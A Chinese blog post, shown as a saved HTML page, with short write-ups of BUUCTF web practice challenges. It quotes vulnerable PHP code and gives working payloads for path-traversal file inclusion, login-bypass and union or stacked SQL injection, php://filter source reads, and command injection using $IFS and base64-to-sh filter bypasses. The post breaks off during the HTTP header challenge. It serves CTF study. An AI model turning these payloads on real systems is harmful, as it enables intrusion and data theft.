<!DOCTYPE html>
<html lang="zh-cn" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="郁涛丶" />
  <meta name="description" content="" />
  
  
  <title>
    
      BUU_WEB刷题_0x01-0x0F 
      
      
      |
    
     郁涛丶&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">

  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="郁涛丶's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Ghostasky</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


    <!-- LaTex Display -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>


        
            
                <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>



                    
                        
                                
                                        
                                                
                                                        
                                                            <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
                                                            <div class="container post-details" id="post-details">
                                                                <div class="post-content">
                                                                    <div class="post-title">
                                                                        BUU_WEB刷题_0x01-0x0F
                                                                    </div>
                                                                    <div class="post-attach">
                                                                        <span class="post-pubtime">
        <i class="iconfont icon-updatetime" title="Update time"></i>
        2021-04-17
      </span>

                                                                        <span class="post-pubtime"> 本文共2.2k字 </span>

                                                                        <span class="post-pubtime">
        大约需要15min
      </span>

                                                                        
                                                                                    <span class="post-categories">
        <i class="iconfont icon-bookmark" title="Categories"></i>
        
        <span class="span--category">
          <a href="/categories/Technology/" title="Technology">
            <b>#</b> Technology
          </a>
        </span>
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            <span class="post-tags">
        <i class="iconfont icon-tags" title="Tags"></i>
        
        <span class="span--tag">
          <a href="/tags/WEB/" title="WEB">
            <b>#</b> WEB
          </a>
        </span>
                                                                            
                                                                                </span>
                                                                                
                                                                    </div>
                                                                    <div class="markdown-body">
                                                                        <p>[TOC]</p>
<h2 id="0x1-HCTF-2018-WarmUp"><a href="#0x1-HCTF-2018-WarmUp" class="headerlink" title="0x1.[HCTF 2018]WarmUp"></a>0x1.[HCTF 2018]WarmUp</h2><p>代码审计+文件包含</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">emmm</span></span></span><br><span class="line"><span class="class">    </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params">&amp;<span class="variable">$page</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable">$whitelist</span> = [<span class="string">&quot;source&quot;</span>=&gt;<span class="string">&quot;source.php&quot;</span>,<span class="string">&quot;hint&quot;</span>=&gt;<span class="string">&quot;hint.php&quot;</span>];</span><br><span class="line">            <span class="keyword">if</span> (! <span class="keyword">isset</span>(<span class="variable">$page</span>) || !is_string(<span class="variable">$page</span>)) &#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">&quot;you can&#x27;t see it&quot;</span>;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (in_array(<span class="variable">$page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$_page</span> = mb_substr(</span><br><span class="line">                <span class="variable">$page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                mb_strpos(<span class="variable">$page</span> . <span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">            );</span><br><span class="line"><span class="comment">/*这里mb_sustr 是个截断，返回0到mb_strpos之间的内容，而mb_strps 则是查找第一次出现的位置，</span></span><br><span class="line"><span class="comment">所以基本可以理解为获取page 两个？之间的字符串，也就是获取file两个？之间的字符串，放到url中就是http://ip/?file=ddd?中的file=ddd*/</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (in_array(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$_page</span> = urldecode(<span class="variable">$page</span>);</span><br><span class="line">            <span class="variable">$_page</span> = mb_substr(</span><br><span class="line">                <span class="variable">$_page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                mb_strpos(<span class="variable">$_page</span> . <span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">            );</span><br><span class="line">            <span class="keyword">if</span> (in_array(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;you can&#x27;t see it&quot;</span>;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (! <span class="keyword">empty</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">        &amp;&amp; is_string(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">        &amp;&amp; emmm::checkFile(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">    ) &#123;</span><br><span class="line">        <span class="keyword">include</span> <span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;</span>;</span><br><span class="line">    &#125;  </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>?file=source.php?/../../../../ffffllllaaaagggg</code></p>
<p>或</p>
<p><code>?file=hint.php?/../../../../ffffllllaaaagggg</code></p>
<h2 id="0x2-极客大挑战-2019-EasySQL"><a href="#0x2-极客大挑战-2019-EasySQL" class="headerlink" title="0x2.[极客大挑战 2019]EasySQL"></a>0x2.[极客大挑战 2019]EasySQL</h2><p>直接</p>
<p><code>payload: username=admin&#39; or &#39;1&#39;=&#39;1&amp;password=aaa&#39; or &#39;1&#39;=&#39;1</code></p>
<p><code>username=admin&amp;password=aa&#39; or &#39;1&#39;=&#39;1</code></p>
<h2 id="0x3-强网杯-2019-随便注"><a href="#0x3-强网杯-2019-随便注" class="headerlink" title="0x3.[强网杯 2019]随便注"></a>0x3.[强网杯 2019]随便注</h2><p>用union select 时：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">return preg_match(&quot;/select|update|delete|drop|insert|where|\./i&quot;,$inject);</span><br></pre></td></tr></table></figure>

<h3 id="1）-堆叠注入："><a href="#1）-堆叠注入：" class="headerlink" title="1）.堆叠注入："></a>1）.堆叠注入：</h3><p>show database;</p>
<p>show tables;</p>
<p>查看表结构：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">desc `1919810931114514`--+</span><br><span class="line">注意要用`引起来</span><br><span class="line">或：show colunms from `1919810931114514`</span><br></pre></td></tr></table></figure>

<p>可以知道，有两个表，words，1919810931114514(这里面有flag)。</p>
<p>大致查询语句应该为：select id,data from words where id&#x3D;;</p>
<p>那么可以将words表改名为aaa，将1919810931114514改为words，再将id改为flag。（偷天换日的感觉）</p>
<blockquote>
<p> 1’; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">修改已知表的列：</span><br><span class="line"></span><br><span class="line">添加一个列</span><br><span class="line">alter table &quot;table_name&quot; add &quot; column_name&quot;  type;</span><br><span class="line"></span><br><span class="line">删除一个列</span><br><span class="line">alter table &quot;table_name&quot; drop &quot; column_name&quot;  type;</span><br><span class="line"></span><br><span class="line">改变列的数据类型</span><br><span class="line">alter table &quot;table_name&quot; alter column &quot; column_name&quot; type;</span><br><span class="line"></span><br><span class="line">改列名</span><br><span class="line">alter table &quot;table_name&quot; change &quot; column1&quot; &quot; column2&quot; type;</span><br><span class="line">alter table &quot;table_name&quot; rename &quot;column1&quot; to &quot;column2&quot;;</span><br></pre></td></tr></table></figure>




<h2 id="0x4-极客大挑战-2019-Havefun"><a href="#0x4-极客大挑战-2019-Havefun" class="headerlink" title="0x4.[极客大挑战 2019]Havefun"></a>0x4.[极客大挑战 2019]Havefun</h2><p>看源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$cat</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;cat&#x27;</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$cat</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$cat</span>==<span class="string">&#x27;dog&#x27;</span>)</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&#x27;Syc&#123;cat_cat_cat_cat&#125;&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>直接出flag</p>
<h2 id="0x5-SUCTF-2019-EasySQL"><a href="#0x5-SUCTF-2019-EasySQL" class="headerlink" title="0x5.[SUCTF 2019]EasySQL"></a>0x5.[SUCTF 2019]EasySQL</h2><p>还是堆叠注入</p>
<p>show databases;和show tables后就不知道干啥了。。</p>
<p>比较坑，没有提示</p>
<p>后来看了wp，查询语句是：select $_post[query] || flag from flag</p>
<h3 id="1）正解"><a href="#1）正解" class="headerlink" title="1）正解"></a>1）正解</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>;<span class="keyword">set</span> sql_mode<span class="operator">=</span>pipes_as_concat;<span class="keyword">select</span> <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>即：select 1;set sql_mode&#x3D;pips_as_concat;select 1 || flag from flag</p>
<p><strong>补充</strong>：</p>
<p>系统变量@@sql_mode：是一组mysql支持的基本语法及校验规则<br>PIPES_AS_CONCAT：将“||”视为字符串的连接操作符而非或运算符，这和Oracle数据库是一样的，也和字符串的拼接函数Concat相类似</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_42373127/article/details/88866710">Mysql中sql_mode参数</a></p>
<h3 id="2）非预期解"><a href="#2）非预期解" class="headerlink" title="2）非预期解"></a>2）非预期解</h3><p>构造：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select *,1 || flag from flag</span><br></pre></td></tr></table></figure>

<h2 id="0x6-ACTF2020-新生赛-Include"><a href="#0x6-ACTF2020-新生赛-Include" class="headerlink" title="0x6.[ACTF2020 新生赛]Include"></a>0x6.[ACTF2020 新生赛]Include</h2><p>使用php:&#x2F;&#x2F;input 伪协议+POST发送php代码，不行</p>
<p>使用php:&#x2F;&#x2F;filter伪协议进行包含</p>
<p>于是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>

<p>php:&#x2F;&#x2F;filter与包含函数结合时，php:&#x2F;&#x2F;filter流会被当作php文件执行。所以我们一般对其进行编码，阻止其不执行。从而导致任意文件读取。</p>
<p>php:&#x2F;&#x2F;filter 伪协议文件包含读取源代码，加上read&#x3D;convert.base64-encode，用base64编码输出，不然会直接当做php代码执行，看不到源代码内容。</p>
<h2 id="0x7-极客大挑战-2019-Secret-File"><a href="#0x7-极客大挑战-2019-Secret-File" class="headerlink" title="0x7.[极客大挑战 2019]Secret File"></a>0x7.[极客大挑战 2019]Secret File</h2><p>有个action.php的文件，之后抓包访问，有个secr3t.php文件，访问：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    error_reporting(<span class="number">0</span>);</span><br><span class="line">    <span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(strstr(<span class="variable">$file</span>,<span class="string">&quot;../&quot;</span>)||stristr(<span class="variable">$file</span>, <span class="string">&quot;tp&quot;</span>)||stristr(<span class="variable">$file</span>,<span class="string">&quot;input&quot;</span>)||stristr(<span class="variable">$file</span>,<span class="string">&quot;data&quot;</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Oh no!&quot;</span>;</span><br><span class="line">        <span class="keyword">exit</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$file</span>); </span><br><span class="line"><span class="comment">//flag放在了flag.php里</span></span><br></pre></td></tr></table></figure>

<p>可以和上一题一样，php:&#x2F;&#x2F;filter</p>
<p>payload: ?file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</p>
<p>解码:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">    &lt;head&gt;</span><br><span class="line">        &lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">        &lt;title&gt;FLAG&lt;/title&gt;</span><br><span class="line">    &lt;/head&gt;</span><br><span class="line"></span><br><span class="line">    &lt;body style=&quot;background-color:black;&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</span><br><span class="line">        </span><br><span class="line">        &lt;h1 style=&quot;font-family:verdana;color:red;text-align:center;&quot;&gt;啊哈！你找到我了！可是你看不到我QAQ~~~&lt;/h1&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</span><br><span class="line">        </span><br><span class="line">        &lt;p style=&quot;font-family:arial;color:red;font-size:20px;text-align:center;&quot;&gt;</span><br><span class="line">            &lt;?php</span><br><span class="line">                echo &quot;我就在这里&quot;;</span><br><span class="line">                $flag = &#x27;flag&#123;2c021ef6-68a2-4674-bf4d-ca928f144327&#125;&#x27;;</span><br><span class="line">                $secret = &#x27;jiAng_Luyuan_w4nts_a_g1rIfri3nd&#x27;</span><br><span class="line">            ?&gt;</span><br><span class="line">        &lt;/p&gt;</span><br><span class="line">    &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="0x8-极客大挑战-2019-LoveSQL"><a href="#0x8-极客大挑战-2019-LoveSQL" class="headerlink" title="0x8.[极客大挑战 2019]LoveSQL"></a>0x8.[极客大挑战 2019]LoveSQL</h2><p>不知道为啥，这里只能%23，不能#和–+</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">?username=admin&#x27;%23&amp;password=1</span><br><span class="line"></span><br><span class="line">?username=admin&#x27; order by 3%23&amp;password=1</span><br><span class="line"></span><br><span class="line">?username=111&#x27; union select 1,2,3%23&amp;password=1</span><br><span class="line">是2和3</span><br><span class="line"></span><br><span class="line">?username=111&#x27; union select 1,database(),3%23&amp;password=1</span><br><span class="line">数据库名：geek</span><br><span class="line"></span><br><span class="line">?username=111&#x27; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#x27;geek&#x27;%23&amp;password=1</span><br><span class="line">得到可疑表：l0ve1ysq1</span><br><span class="line"></span><br><span class="line">?username=111&#x27; union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=&#x27;geek&#x27; and table_name=&#x27;l0ve1ysq1&#x27;%23&amp;password=1</span><br><span class="line">得到字段id,username,password</span><br><span class="line"></span><br><span class="line">?username=111&#x27; union select 1,group_concat(id,username,password),3 from geek.l0ve1ysq1%23&amp;password=1</span><br><span class="line">或者：</span><br><span class="line">?username=111&#x27; union select id,username,password from geek.l0ve1ysq1 limit 0,1%23&amp;password=1</span><br><span class="line">一个一个查</span><br></pre></td></tr></table></figure>

<h2 id="0x9-ACTF2020-新生赛-Exec"><a href="#0x9-ACTF2020-新生赛-Exec" class="headerlink" title="0x9.[ACTF2020 新生赛]Exec"></a>0x9.[ACTF2020 新生赛]Exec</h2><p>就是连接命令，可以管道符||，也可以分号，或者&amp;这个符号。</p>
<p>但是经过测试，之后分号可以多个命令一起执行（在这道题）</p>
<p><img src="/2021/04/17/BUU-WEB-0x1-0xF/image-20210415165001140.png" alt="image-20210415165001140"></p>
<p>找到flag.</p>
<h2 id="0xA-GXYCTF2019-Ping-Ping-Ping"><a href="#0xA-GXYCTF2019-Ping-Ping-Ping" class="headerlink" title="0xA.[GXYCTF2019]Ping Ping Ping"></a>0xA.[GXYCTF2019]Ping Ping Ping</h2><p>打开后发现无论是cat flag.php还是index.php都打不开，经过测试发现可能是过滤了空格。</p>
<blockquote>
<ol>
<li>${IFS}替换</li>
<li>$IFS$1替换</li>
<li>${IFS替换</li>
<li>%20替换</li>
<li>&lt;和&lt;&gt;重定向符替换</li>
<li>%09替换</li>
</ol>
</blockquote>
<p>$IFS是shell中的一个变量，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;ip&#x27;</span>]))&#123;</span><br><span class="line">  <span class="variable">$ip</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;ip&#x27;</span>];</span><br><span class="line">  <span class="keyword">if</span>(preg_match(<span class="string">&quot;/\&amp;|\/|\?|\*|\&lt;|[\x&#123;00&#125;-\x&#123;1f&#125;]|\&gt;|\&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;</span>, <span class="variable">$ip</span>, <span class="variable">$match</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> preg_match(<span class="string">&quot;/\&amp;|\/|\?|\*|\&lt;|[\x&#123;00&#125;-\x&#123;20&#125;]|\&gt;|\&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;</span>, <span class="variable">$ip</span>, <span class="variable">$match</span>);</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;fxck your symbol!&quot;</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span>(preg_match(<span class="string">&quot;/ /&quot;</span>, <span class="variable">$ip</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;fxck your space!&quot;</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span>(preg_match(<span class="string">&quot;/bash/&quot;</span>, <span class="variable">$ip</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;fxck your bash!&quot;</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span>(preg_match(<span class="string">&quot;/.*f.*l.*a.*g.*/&quot;</span>, <span class="variable">$ip</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;fxck your flag!&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="variable">$a</span> = shell_exec(<span class="string">&quot;ping -c 4 &quot;</span>.<span class="variable">$ip</span>);</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;&lt;pre&gt;&quot;</span>;</span><br><span class="line">  print_r(<span class="variable">$a</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>可以看到确实过滤了很多东西</p>
<h3 id="1-拼接"><a href="#1-拼接" class="headerlink" title="1)拼接"></a>1)拼接</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=1;a=g;cat$IFS$1fla$a.php;</span><br></pre></td></tr></table></figure>

<h3 id="2-base64"><a href="#2-base64" class="headerlink" title="2)base64"></a>2)base64</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh</span><br></pre></td></tr></table></figure>

<p>其中Y2F0IGZsYWcucGhw是cat flag.php的base64编码，之后用base64 -d命令解码</p>
<h3 id="3-内敛绕过-NB"><a href="#3-内敛绕过-NB" class="headerlink" title="3)内敛绕过(NB)"></a>3)内敛绕过(NB)</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=111;cat$IFS$1`ls`</span><br></pre></td></tr></table></figure>

<p>就是将反引号内命令的输出作为输入执行。</p>
<h2 id="0xB-极客大挑战-2019-Knife"><a href="#0xB-极客大挑战-2019-Knife" class="headerlink" title="0xB.[极客大挑战 2019]Knife"></a>0xB.[极客大挑战 2019]Knife</h2><p>菜刀连一下就OK</p>
<h2 id="0xC-RoarCTF-2019-Easy-Calc"><a href="#0xC-RoarCTF-2019-Easy-Calc" class="headerlink" title="0xC.[RoarCTF 2019]Easy Calc"></a>0xC.[RoarCTF 2019]Easy Calc</h2><p>这题用到的知识点：<strong>PHP的字符串解析特性</strong></p>
<p><strong>可以先查看根目录下文件：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?%20num=1;var_dump(scandir(chr(47)))</span><br></pre></td></tr></table></figure>

<p><img src="/2021/04/17/BUU-WEB-0x1-0xF/image-20210415181858484.png" alt="image-20210415181858484"></p>
<p>为什么要在num前加空格？</p>
<p>​	假如waf不允许num变量传递字母，可以在num前加个空格，这样waf就找不到num这个变量了，因为现在的变量叫“ num”，而不是“num”。但php在解析的时候，会先把空格给去掉，这样我们的代码还能正常运行，还上传了非法字符。</p>
<p>如果发现过滤，可以使用chr()转ascii之后拼接。</p>
<p><strong>列出flagg</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?%20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))</span><br></pre></td></tr></table></figure>

<p>之后得到flag</p>
<p><strong>PHP的字符串解析特性是什么？</strong></p>
<p>答： PHP需要将所有参数转换为有效的变量名，因此在<strong>解析查询字符串时</strong>，它会做两件事：</p>
<p>1.删除空白符 </p>
<p>2.将某些字符转换为下划线（包括空格）</p>
<p>[当waf不让你过的时候，php却可以让你过]</p>
<p>还有一种方法：</p>
<p><strong>HTTP走私攻击（HTTP数据接收不同步攻击）</strong></p>
<h2 id="0xD-极客大挑战-2019-Http"><a href="#0xD-极客大挑战-2019-Http" class="headerlink" title="0xD.[极客大挑战 2019]Http"></a>0xD.[极客大挑战 2019]Http</h2><p>找到Secret.php文件</p>
<p>说没有来自<a target="_blank" rel="noopener" href="https://www.sycsecret.com网站,加/">https://www.Sycsecret.com网站，加</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Referer:https://www.Sycsecret.com</span><br></pre></td></tr></table></figure>

<p>又说不是某个浏览器i，该user-agent</p>
